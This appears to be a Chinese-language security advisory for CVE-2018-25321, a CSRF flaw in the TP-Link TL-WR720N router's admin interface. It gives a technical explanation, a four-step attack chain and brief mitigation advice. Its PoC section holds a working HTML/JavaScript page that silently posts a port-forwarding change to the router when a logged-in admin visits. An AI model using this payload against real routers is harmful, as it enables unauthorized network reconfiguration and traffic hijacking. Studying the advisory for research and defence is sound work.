IPBUF安全漏洞报告
English
CVE-2018-25321 CVSS 4.3 中危

CVE-2018-25321 TP-Link路由器CSRF漏洞

披露日期: 2026-05-17

漏洞信息

漏洞编号
CVE-2018-25321
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
TP-Link TL-WR720N

相关标签

CSRF跨站请求伪造TP-LinkTL-WR720N路由器漏洞

漏洞概述

TP-Link TL-WR720N无线路由器存在跨站请求伪造(CSRF)漏洞。由于管理后台未对关键请求进行令牌验证,攻击者可设计恶意网页,诱导已登录的管理员用户访问。当受害者加载页面时,浏览器将自动向路由器发送伪造请求,导致攻击者能在未经授权的情况下修改端口转发规则或更改WiFi安全设置,从而破坏网络配置完整性。

技术细节

该漏洞主要影响TP-Link TL-WR720N路由器的Web管理接口,其根本原因在于应用程序未对敏感操作实施充分的跨站请求伪造防护机制。具体而言,当路由器处理通过VirtualServerRpm.htm(端口转发)和WlanSecurityRpm.htm(无线安全)提交的配置更改请求时,缺乏对请求来源合法性的有效验证(如缺失CSRF Token或Referer检查)。攻击者可以利用这一缺陷,精心构造包含恶意HTTP请求的HTML页面或JavaScript脚本。该请求被设计为向路由器的管理接口发送特定的参数值,以修改系统配置。由于攻击者无法直接绕过认证,他们必须采用社会工程学手段,诱导已经登录路由器管理后台的受害者访问该恶意页面。一旦受害者访问,其浏览器将在后台利用当前有效的会话Cookie,自动向路由器发送伪造的请求。由于路由器无法区分请求是由管理员亲自发起还是由恶意页面触发的,它将接受并执行这些指令,导致端口转发规则被篡改或WiFi安全设置被更改,进而引发网络流量劫持或服务拒绝等严重后果。

攻击链分析

STEP 1
1. 构造攻击载荷
攻击者针对TL-WR720N的VirtualServerRpm.htm接口,编写包含恶意HTTP POST请求的HTML页面,旨在修改端口转发规则。
STEP 2
2. 社会工程学诱导
攻击者通过电子邮件或即时通讯工具,将包含恶意代码的链接发送给目标路由器的管理员,诱导其点击访问。
STEP 3
3. 触发伪造请求
当管理员在保持登录状态的情况下访问该页面时,浏览器解析并自动向路由器管理后台发送带有会话Cookie的恶意请求。
STEP 4
4. 执行未授权操作
路由器接收到请求,由于缺乏CSRF验证,误认为是管理员的合法操作,执行修改端口转发规则的指令,完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for CVE-2018-25321 --> <!-- This PoC demonstrates a CSRF attack to modify port forwarding rules --> <!-- The victim must be logged into the router admin panel --> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://192.168.1.1/VirtualServerRpm.htm", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // Payload to add a port forwarding rule (Example: forwarding external port 8080 to internal 192.168.1.100:80) var params = "index=0&internalClient=192.168.1.100&internalPort=80&externalPort=8080&protocol=1&enable=1&save=Save"; xhr.send(params); } // Execute automatically on page load window.onload = submitRequest; </script> <p>CSRF PoC executed. Check router settings.</p> </body> </html>

影响范围

TP-Link TL-WR720N (所有版本)

防御指南

临时缓解措施
建议用户在完成管理操作后立即退出登录,避免在浏览其他网页时保持登录状态。同时,仅在需要时访问管理后台,并确保仅通过受信任的设备进行管理。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表